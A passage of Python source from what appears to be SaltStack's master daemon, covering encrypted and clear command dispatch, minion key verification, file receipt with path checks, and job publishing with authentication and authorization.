'stats')) self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0}) self.stat_clock = end def _handle_clear(self, load): ''' Process a cleartext command :param dict load: Cleartext payload :return: The result of passing the load to a function in ClearFuncs corresponding to the command specified in the load's 'cmd' key. ''' log.trace('Clear payload received with command %s', load['cmd']) cmd = load['cmd'] method = self.clear_funcs.get_method(cmd) if not method: return {}, {'fun': 'send_clear'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 ret = method(load), {'fun': 'send_clear'} if self.opts['master_stats']: self._post_stats(start, cmd) return ret def _handle_aes(self, data): ''' Process a command sent via an AES key :param str load: Encrypted payload :return: The result of passing the load to a function in AESFuncs corresponding to the command specified in the load's 'cmd' key. 
''' if 'cmd' not in data: log.error('Received malformed command %s', data) return {} cmd = data['cmd'] log.trace('AES payload received with command %s', data['cmd']) method = self.aes_funcs.get_method(cmd) if not method: return {}, {'fun': 'send'} if self.opts['master_stats']: start = time.time() self.stats[cmd]['runs'] += 1 ret = self.aes_funcs.run_func(data['cmd'], data) if self.opts['master_stats']: self._post_stats(start, cmd) return ret def run(self): ''' Start a Master Worker ''' salt.utils.process.appendproctitle(self.name) self.clear_funcs = ClearFuncs( self.opts, self.key, ) self.aes_funcs = AESFuncs(self.opts) salt.utils.crypt.reinit_crypto() self.__bind() class TransportMethods(object): ''' Expose methods to the transport layer, methods with their names found in the class attribute 'expose_methods' will be exposed to the transport layer via 'get_method'. ''' expose_methods = () def get_method(self, name): ''' Get a method which should be exposed to the transport layer ''' if name in self.expose_methods: try: return getattr(self, name) except AttributeError: log.error("Expose method not found: %s", name) else: log.error("Requested method not exposed: %s", name) # TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests class AESFuncs(TransportMethods): ''' Set up functions that are available when the load is encrypted with AES ''' expose_methods = ( 'verify_minion', '_master_tops', '_ext_nodes', '_master_opts', '_mine_get', '_mine', '_mine_delete', '_mine_flush', '_file_recv', '_pillar', '_minion_event', '_handle_minion_event', '_return', '_syndic_return', '_minion_runner', 'pub_ret', 'minion_pub', 'minion_publish', 'revoke_auth', 'run_func', '_serve_file', '_file_find', '_file_hash', '_file_find_and_stat', '_file_list', '_file_list_emptydirs', '_dir_list', '_symlink_list', '_file_envs', ) def __init__(self, opts): ''' Create a new AESFuncs :param dict opts: The salt options :rtype: AESFuncs :returns: Instance for handling AES operations ''' self.opts = opts self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) self.serial = salt.payload.Serial(opts) self.ckminions = salt.utils.minions.CkMinions(opts) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Create the master minion to access the external job cache self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) self.__setup_fileserver() self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts) def __setup_fileserver(self): ''' Set the local file objects from the file server interface ''' # Avoid circular import import salt.fileserver self.fs_ = salt.fileserver.Fileserver(self.opts) self._serve_file = self.fs_.serve_file self._file_find = self.fs_._find_file self._file_hash = self.fs_.file_hash self._file_hash_and_stat = self.fs_.file_hash_and_stat self._file_list = self.fs_.file_list self._file_list_emptydirs = self.fs_.file_list_emptydirs self._dir_list = self.fs_.dir_list self._symlink_list = self.fs_.symlink_list self._file_envs = self.fs_.file_envs def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. 
''' if not salt.utils.verify.valid_id(self.opts, id_): return False pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) try: pub = salt.crypt.get_rsa_pub_key(pub_path) except (IOError, OSError): log.warning( 'Salt minion claiming to be %s attempted to communicate with ' 'master, but key could not be read and verification was denied.', id_ ) return False except (ValueError, IndexError, TypeError) as err: log.error('Unable to load public key "%s": %s', pub_path, err) try: if salt.crypt.public_decrypt(pub, token) == b'salt': return True except ValueError as err: log.error('Unable to decrypt token: %s', err) log.error( 'Salt minion claiming to be %s has attempted to communicate with ' 'the master and could not be verified', id_ ) return False def verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. ''' return self.__verify_minion(id_, token) def __verify_minion_publish(self, clear_load): ''' Verify that the passed information authorized a minion to execute :param dict clear_load: A publication load from a minion :rtype: bool :return: A boolean indicating if the minion is allowed to publish the command in the load ''' # Verify that the load is valid if 'peer' not in self.opts: return False if not isinstance(self.opts['peer'], dict): return False if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')): return False # If the command will make a recursive publish don't run if clear_load['fun'].startswith('publish.'): return False # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning( 'Minion id %s is not who it says it is and is attempting ' 'to issue a peer command', clear_load['id'] ) return False clear_load.pop('tok') perms = [] for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.extend(self.opts['peer'][match]) if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ # finally, check the auth of the load return self.ckminions.auth_check( perms, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), publish_validate=True) def __verify_load(self, load, verify_keys): ''' A utility function to perform common verification steps. :param dict load: A payload received from a minion :param list verify_keys: A list of strings that should be present in a given load :rtype: bool :rtype: dict :return: The original load (except for the token) if the load can be verified. False if the load is invalid. ''' if any(key not in load for key in verify_keys): return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! 
log.warning('Minion id %s is not who it says it is!', load['id']) return False if 'tok' in load: load.pop('tok') return load def _master_tops(self, load): ''' Return the results from an external node classifier if one is specified :param dict load: A payload received from a minion :return: The results from an external node classifier ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} return self.masterapi._master_tops(load, skip_verify=True) # Needed so older minions can request master_tops _ext_nodes = _master_tops def _master_opts(self, load): ''' Return the master options to the minion :param dict load: A payload received from a minion :rtype: dict :return: The master options ''' mopts = {} file_roots = {} envs = self._file_envs() for saltenv in envs: if saltenv not in file_roots: file_roots[saltenv] = [] mopts['file_roots'] = file_roots mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy'] mopts['env_order'] = self.opts['env_order'] mopts['default_top'] = self.opts['default_top'] if load.get('env_only'): return mopts mopts['renderer'] = self.opts['renderer'] mopts['failhard'] = self.opts['failhard'] mopts['state_top'] = self.opts['state_top'] mopts['state_top_saltenv'] = self.opts['state_top_saltenv'] mopts['nodegroups'] = self.opts['nodegroups'] mopts['state_auto_order'] = self.opts['state_auto_order'] mopts['state_events'] = self.opts['state_events'] mopts['state_aggregate'] = self.opts['state_aggregate'] mopts['jinja_env'] = self.opts['jinja_env'] mopts['jinja_sls_env'] = self.opts['jinja_sls_env'] mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks'] mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks'] return mopts def _mine_get(self, load): ''' Gathers the data from the specified minions' mine :param dict load: A payload received from a minion :rtype: dict :return: Mine data from the specified minions ''' load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_get(load, skip_verify=True) def _mine(self, load): ''' Store the mine data :param dict load: A payload received from a minion :rtype: bool :return: True if the data has been stored in the mine ''' load = self.__verify_load(load, ('id', 'data', 'tok')) if load is False: return {} return self.masterapi._mine(load, skip_verify=True) def _mine_delete(self, load): ''' Allow the minion to delete a specific function from its own mine :param dict load: A payload received from a minion :rtype: bool :return: Boolean indicating whether or not the given function was deleted from the mine ''' load = self.__verify_load(load, ('id', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_delete(load) def _mine_flush(self, load): ''' Allow the minion to delete all of its own mine contents :param dict load: A payload received from a minion ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} else: return self.masterapi._mine_flush(load, skip_verify=True) def _file_recv(self, load): ''' Allows minions to send files to the master, files are sent to the master file cache ''' if any(key not in load for key in ('id', 'path', 'loc')): return False if not isinstance(load['path'], list): return False if not self.opts['file_recv']: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False file_recv_max_size = 1024*1024 * self.opts['file_recv_max_size'] if 'loc' in load and load['loc'] < 0: log.error('Invalid file pointer: load[loc] < 0') return 
False if len(load['data']) + load.get('loc', 0) > file_recv_max_size: log.error( 'file_recv_max_size limit of %d MB exceeded! %s will be ' 'truncated. To successfully push this file, adjust ' 'file_recv_max_size to an integer (in MB) large enough to ' 'accommodate it.', file_recv_max_size, load['path'] ) return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning('Minion id %s is not who it says it is!', load['id']) return {} load.pop('tok') # Join path sep_path = os.sep.join(load['path']) # Path normalization should have been done by the sending # minion but we can't guarantee it. Re-do it here. normpath = os.path.normpath(sep_path) # Ensure that this safety check is done after the path # have been normalized. if os.path.isabs(normpath) or '../' in load['path']: # Can overwrite master files!! return False cpath = os.path.join( self.opts['cachedir'], 'minions', load['id'], 'files', normpath) # One last safety check here if not os.path.normpath(cpath).startswith(self.opts['cachedir']): log.warning( 'Attempt to write received file outside of master cache ' 'directory! Requested path: %s. Access denied.', cpath ) return False cdir = os.path.dirname(cpath) if not os.path.isdir(cdir): try: os.makedirs(cdir) except os.error: pass if os.path.isfile(cpath) and load['loc'] != 0: mode = 'ab' else: mode = 'wb' with salt.utils.files.fopen(cpath, mode) as fp_: if load['loc']: fp_.seek(load['loc']) fp_.write(salt.utils.stringutils.to_bytes(load['data'])) return True def _pillar(self, load): ''' Return the pillar data for the minion :param dict load: Minion payload :rtype: dict :return: The pillar data for the minion ''' if any(key not in load for key in ('id', 'grains')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False load['grains']['id'] = load['id'] pillar = salt.pillar.get_pillar( self.opts, load['grains'], load['id'], load.get('saltenv', load.get('env')), ext=load.get('ext'), pillar_override=load.get('pillar_override', {}), pillarenv=load.get('pillarenv'), extra_minion_data=load.get('extra_minion_data')) data = pillar.compile_pillar() self.fs_.update_opts() if self.opts.get('minion_data_cache', False): self.masterapi.cache.store('minions/{0}'.format(load['id']), 'data', {'grains': load['grains'], 'pillar': data}) if self.opts.get('minion_data_cache_events') is True: self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion')) return data def _minion_event(self, load): ''' Receive an event from the minion and fire it on the master event interface :param dict load: The minion payload ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} # Route to master event bus self.masterapi._minion_event(load) # Process locally self._handle_minion_event(load) def _handle_minion_event(self, load): ''' Act on specific events from minions ''' id_ = load['id'] if load.get('tag', '') == '_salt_error': log.error( 'Received minion error from [%s]: %s', id_, load['data']['message'] ) for event in load.get('events', []): event_data = event.get('data', {}) if 'minions' in event_data: jid = event_data.get('jid') if not jid: continue minions = event_data['minions'] try: salt.utils.job.store_minions( self.opts, jid, minions, mminion=self.mminion, syndic_id=id_) except 
(KeyError, salt.exceptions.SaltCacheError) as exc: log.error( 'Could not add minion(s) %s for job %s: %s', minions, jid, exc ) def _return(self, load): ''' Handle the return data sent from the minions. Takes the return, verifies it and fires it on the master event bus. Typically, this event is consumed by the Salt CLI waiting on the other end of the event bus but could be heard by any listener on the bus. :param dict load: The minion payload ''' if self.opts['require_minion_sign_messages'] and 'sig' not in load: log.critical( '_return: Master is requiring minions to sign their ' 'messages, but there is no signature in this payload from ' '%s.', load['id'] ) return False if 'sig' in load: log.trace('Verifying signed event publish from minion') sig = load.pop('sig') this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id'])) serialized_load = salt.serializers.msgpack.serialize(load) if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig): log.info('Failed to verify event signature from minion %s.', load['id']) if self.opts['drop_messages_signature_fail']: log.critical( 'Drop_messages_signature_fail is enabled, dropping ' 'message from %s', load['id'] ) return False else: log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.') load['sig'] = sig try: salt.utils.job.store_job( self.opts, load, event=self.event, mminion=self.mminion) except salt.exceptions.SaltCacheError: log.error('Could not store job information for load: %s', load) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. :param dict load: The minion payload ''' loads = load.get('load') if not isinstance(loads, list): loads = [load] # support old syndics not aggregating returns for load in loads: # Verify the load if any(key not in load for key in ('return', 'jid', 'id')): continue # if we have a load, save it if load.get('load'): fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load['jid'], load['load']) # Register the syndic syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id']) if not os.path.exists(syndic_cache_path): path_name = os.path.split(syndic_cache_path)[0] if not os.path.exists(path_name): os.makedirs(path_name) with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh: wfh.write('') # Format individual return loads for key, item in six.iteritems(load['return']): ret = {'jid': load['jid'], 'id': key} ret.update(item) if 'master_id' in load: ret['master_id'] = load['master_id'] if 'fun' in load: ret['fun'] = load['fun'] if 'arg' in load: ret['fun_args'] = load['arg'] if 'out' in load: ret['out'] = load['out'] if 'sig' in load: ret['sig'] = load['sig'] self._return(ret) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data :param dict clear_load: The minion payload :rtype: dict :return: The runner function data ''' load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok')) if load is False: return {} else: return self.masterapi.minion_runner(clear_load) def pub_ret(self, load): ''' Request the return data from a specific jid, only allowed if the requesting minion also initialted the execution. 
:param dict load: The minion payload :rtype: dict :return: Return data corresponding to a given JID ''' load = self.__verify_load(load, ('jid', 'id', 'tok')) if load is False: return {} # Check that this minion can access this data auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, six.text_type(load['jid'])) with salt.utils.files.fopen(jid_fn, 'r') as fp_: if not load['id'] == fp_.read(): return {} # Grab the latest and return return self.local.get_cache_returns(load['jid']) def minion_pub(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands: .. code-block:: bash peer: foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion pay ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_pub(clear_load) def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands. peer: .. code-block:: bash foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion payload ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_publish(clear_load) def revoke_auth(self, load): ''' Allow a minion to request revocation of its own key :param dict load: The minion payload :rtype: dict :return: If the load is invalid, it may be returned. No key operation is performed. :rtype: bool :return: True if key was revoked, False if not ''' load = self.__verify_load(load, ('id', 'tok')) if not self.opts.get('allow_minion_key_revoke', False): log.warning( 'Minion %s requested key revoke, but allow_minion_key_revoke ' 'is set to False', load['id'] ) return load if load is False: return load else: return self.masterapi.revoke_auth(load) def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption :param function func: The function to run :return: The result of the master function that was called ''' # Don't honor private functions if func.startswith('__'): # TODO: return some error? 
Seems odd to return {} return {}, {'fun': 'send'} # Run the func if hasattr(self, func): try: start = time.time() ret = getattr(self, func)(load) log.trace( 'Master function call %s took %s seconds', func, time.time() - start ) except Exception: ret = '' log.error('Error in function %s:\n', func, exc_info=True) else: log.error( 'Received function %s which is unavailable on the master, ' 'returning False', func ) return False, {'fun': 'send'} # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) if func == '_return': return ret, {'fun': 'send'} if func == '_pillar' and 'id' in load: if load.get('ver') != '2' and self.opts['pillar_version'] == 1: # Authorized to return old pillar proto return ret, {'fun': 'send'} return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']} # Encrypt the return return ret, {'fun': 'send'} class ClearFuncs(TransportMethods): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # These methods will be exposed to the transport layer by # MWorker._handle_clear expose_methods = ( 'ping', 'publish', 'get_token', 'mk_token', 'wheel', 'runner', ) # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key): self.opts = opts self.key = key # Create the event manager self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Make an minion checker object self.ckminions = salt.utils.minions.CkMinions(opts) # Make an Auth object self.loadauth = salt.auth.LoadAuth(opts) # Stand up the master Minion to access returner data self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) # Make a wheel object self.wheel_ = salt.wheel.Wheel(opts) # Make a masterapi object self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key) def runner(self, clear_load): ''' Send a master control function back to the runner system ''' # All runner ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': runner_check = self.ckminions.runner_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not runner_check: return {'error': {'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username)}} elif isinstance(runner_check, dict) and 'error' in runner_check: # A dictionary with an error name/message was handled by ckminions.runner_check return runner_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! 
try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.asynchronous(fun, clear_load.get('kwarg', {}), username, local=True) except Exception as exc: log.error('Exception occurred while introspecting %s: %s', fun, exc) return {'error': {'name': exc.__class__.__name__, 'args': exc.args, 'message': six.text_type(exc)}} def wheel(self, clear_load): ''' Send a master control function back to the wheel system ''' jid = clear_load.get('__jid__', salt.utils.jid.gen_jid(self.opts)) # All wheel ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. data = {'error': error, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': wheel_check = self.ckminions.wheel_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not wheel_check: err_data = { 'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username) } data = {'error': err_data, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': err_data} elif isinstance(wheel_check, dict) and 'error' in wheel_check: # A dictionary with an error name/message was handled by ckminions.wheel_check return wheel_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! try: fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': username} self.event.fire_event(data, tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, full_return=True, **clear_load) data['return'] = ret['return'] data['success'] = ret['success'] self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error('Exception occurred while introspecting %s: %s', fun, exc) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) data['success'] = False self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} def mk_token(self, clear_load): ''' Create and return an authentication token, the clear load needs to contain the eauth key and the needed authentication creds. ''' token = self.loadauth.mk_token(clear_load) if not token: log.warning('Authentication failure of type "eauth" occurred.') return '' return token def get_token(self, clear_load): ''' Return the name associated with a token or False if the token is invalid ''' if 'token' not in clear_load: return False return self.loadauth.get_tok(clear_load['token']) def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. 
''' extra = clear_load.get('kwargs', {}) publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist']) if publisher_acl.user_is_blacklisted(clear_load['user']) or \ publisher_acl.cmd_is_blacklisted(clear_load['fun']): log.error( '%s does not have permissions to run %s. Please contact ' 'your local administrator if you believe this is in ' 'error.\n', clear_load['user'], clear_load['fun'] ) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Retrieve the minions list delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) _res = self.ckminions.check_minions( clear_load['tgt'], clear_load.get('tgt_type', 'glob'), delimiter ) minions = _res.get('minions', list()) missing = _res.get('missing', list()) ssh_minions = _res.get('ssh_minions', False) # Check for external auth calls and authenticate auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra) if auth_type == 'user': auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) else: auth_check = self.loadauth.check_authentication(extra, auth_type) # Setup authorization list variable and error information auth_list = auth_check.get('auth_list', []) err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type) if auth_check.get('error'): # Authentication error occurred: do not continue. log.warning(err_msg) return {'error': {'name': 'AuthenticationError', 'message': 'Authentication error occurred.'}} # All Token, Eauth, and non-root users must pass the authorization check if auth_type != 'user' or (auth_type == 'user' and auth_list): # Authorize the request authorized = self.ckminions.auth_check( auth_list, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), minions=minions, # always accept find_job whitelist=['saltutil.find_job'], ) if not authorized: # Authorization error occurred. Do not continue. if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra: log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username']) log.warning(err_msg) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Perform some specific auth_type tasks after the authorization check if auth_type == 'token': username = auth_check.get('username') clear_load['user'] = username log.debug('Minion tokenized user = "%s"', username) elif auth_type == 'eauth': # The username we are attempting to auth with clear_load['user'] = self.loadauth.load_name(extra) # If we order masters (via a syndic), don't short circuit if no minions # are found if not self.opts.get('order_masters'): # Check for no minions if not minions: return { 'enc': 'clear', 'load': { 'jid': None, 'minions': minions, 'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt']) } } jid = self._prep_jid(clear_load, extra) if jid is None: return {'enc': 'clear', 'load': {'error': 'Master failed to assign jid'}} payload = self._prep_pub(minions, jid, clear_load, extra, missing) # Send it! 
self._send_ssh_pub(payload, ssh_minions=ssh_minions) self._send_pub(payload) return { 'enc': 'clear', 'load': { 'jid': clear_load['jid'], 'minions': minions, 'missing': missing } } def _prep_auth_info(self, clear_load): sensitive_load_keys = [] key = None if 'token' in clear_load: auth_type = 'token' err_name = 'TokenAuthenticationError' sensitive_load_keys = ['token'] elif 'eauth' in clear_load: auth_type = 'eauth' err_name = 'EauthAuthenticationError' sensitive_load_keys = ['username', 'password'] else: auth_type = 'user' err_name = 'UserAuthenticationError' key = self.key return auth_type, err_name, key, sensitive_load_keys def _prep_jid(self, clear_load, extra): ''' Return a jid for this publication ''' # the jid in clear_load can be None, '', or something else. this is an # attempt to clean up the value before passing to plugins passed_jid = clear_load['jid'] if clear_load.get('jid') else None nocache = extra.get('nocache', False) # Retrieve the jid fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) try: # Retrieve the jid jid = self.mminion.returners[fstr](nocache=nocache, passed_jid=passed_jid) except (KeyError, TypeError): # The returner is not present msg = ( 'Failed to allocate a jid. The requested returner \'{0}\' ' 'could not be loaded.'.format(fstr.split('.')[0]) ) log.error(msg) return {'error': msg} return jid def _send_pub(self, load): ''' Take a load and send it across the network to connected minions ''' for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.publish(load) @property def ssh_client(self): if not hasattr(self, '_ssh_client'): self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts) return self._ssh_client def _send_ssh_pub(self, load, ssh_minions=False): ''' Take a load and send it across the network to ssh minions ''' if self.opts['enable_ssh_minions'] is True and ssh_minions is True: log.debug('Send payload to ssh minions') threading.Thread(target=self.ssh_client.cmd, kwargs=load).start() def _prep_pub(self, minions, jid, clear_load, extra, missing): ''' Take a given load and perform the necessary steps to prepare a publication. TODO: This is really only bound by temporal cohesion and thus should be refactored even further. ''' clear_load['jid'] = jid delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) # TODO Error reporting over the master event bus self.event.fire_event({'minions': minions}, clear_load['jid']) new_job_load = { 'jid': clear_load['jid'], 'tgt_type': clear_load['tgt_type'], 'tgt': clear_load['tgt'], 'user': clear_load['user'], 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'minions': minions, 'missing': missing, } # Announce the job on the event bus self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job')) if self.opts['ext_job_cache']: fstr = '{0}.save_load'.format(self.opts['ext_job_cache']) save_load_func = True # Get the returner's save_load arg_spec. try: arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr]) # Check if 'minions' is included in returner's save_load arg_spec. # This may be missing in custom returners, which we should warn about. 
if 'minions' not in arg_spec.args: log.critical( 'The specified returner used for the external job cache ' '\'%s\' does not have a \'minions\' kwarg in the returner\'s ' 'save_load function.', self.opts['ext_job_cache'] ) except (AttributeError, KeyError): save_load_func = False log.critical( 'The specified returner used for the external job cache ' '"%s" does not have a save_load function!', self.opts['ext_job_cache'] ) if save_load_func: try: self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # always write out to the master job caches try: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load, minions) except KeyError: log.critical( 'The specified returner used for the master job cache ' '"%s" does not have a save_load function!', self.opts['master_job_cache'] ) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. # # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } # if you specified a master id, lets put that in the load if 'master_id' in self.opts: load['master_id'] = self.opts['master_id'] # if someone passed us one, use that if 'master_id' in extra: load['master_id'] = extra['master_id'] # Only add the delimiter to the pub data if it is non-default if delimiter != DEFAULT_TARGET_DELIM: load['delimiter'] = delimiter if 'id' in extra: load['id'] = extra['id'] if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'kwargs' in clear_load: if 'ret_config' in clear_load['kwargs']: load['ret_config'] = clear_load['kwargs'].get('ret_config') if 'metadata' in clear_load['kwargs']: load['metadata'] = clear_load['kwargs'].get('metadata') if 'module_executors' in clear_load['kwargs']: load['module_executors'] = clear_load['kwargs'].get('module_executors') if 'executor_opts' in clear_load['kwargs']: load['executor_opts'] = clear_load['kwargs'].get('executor_opts') if 'ret_kwargs' in clear_load['kwargs']: load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs') if 'user' in clear_load: log.info( 'User %s Published command %s with jid %s', clear_load['user'], clear_load['fun'], clear_load['jid'] ) load['user'] = clear_load['user'] else: log.info( 'Published command %s with jid %s', clear_load['fun'], clear_load['jid'] ) log.debug('Published command details %s', load) return load def ping(self, clear_load): ''' Send the load back to the sender. 
        '''
        return clear_load


class FloMWorker(MWorker):
    '''
    Change the run and bind to be ioflo friendly
    '''
    def __init__(self,
                 opts,
                 key,
                 ):
        MWorker.__init__(self, opts, key)

    def setup(self):
        '''
        Prepare the needed objects and socket for iteration within ioflo
        '''
        salt.utils.crypt.appendproctitle(self.__class__.__name__)
        self.clear_funcs = salt.master.ClearFuncs(
            self.opts,
            self.key,
        )
